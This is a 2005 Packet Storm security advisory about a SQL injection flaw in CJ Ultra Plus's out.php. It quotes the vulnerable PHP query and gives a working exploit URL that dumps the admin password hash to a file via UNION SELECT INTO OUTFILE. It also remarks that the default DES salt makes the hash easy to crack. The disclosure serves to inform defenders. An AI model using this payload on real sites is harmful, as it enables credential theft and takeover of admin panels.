cjultraSQL.txt

2005-08-06T00:00:00
ID PACKETSTORM:39097
Type packetstorm
Reporter maggik
Modified 2005-08-06T00:00:00

Description

                                        
                                            `  
  
#################################################   
# ADVISORY #  
#Sql Injection in CJ Ultra Plus v1.0.3-1.0.4(?) #  
#################################################  
"My God, it's full of stars" - (c) MwNN  
  
  
  
Vulnerable code is in out.php  
  
<---code begin-->  
...  
if (isset($perm)) {  
$query = "select a1, a2 from trade where a1 = '$perm'"; <-muhahaha  
$result = mysql_query($query);  
if(!$result) error_message(sql_error());  
...  
<---code end---->  
  
So...  
  
Exploit:  
  
/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*  
  
And you will get x.txt with something like that inside:  
  
<--BEGIN-->  
aaQSqAReePlq6 aaQSqAReePlq6  
<___EOF___>  
  
This is crypt()'ed in DES password for admin panel.  
The SALT is 'aa' for default, so you won't get any troubles with decryption.  
  
Greetz to: 0xdeadbabe(i luv u, br0w), foster(daddy!), mestereeo(br0w! :)), GHC, unl0ck(Eagalito!), raistlyn, .dtors & others.  
  
Contact me: [maggik `at` gala `dot` net]  
ISeekU: [3316667]  
`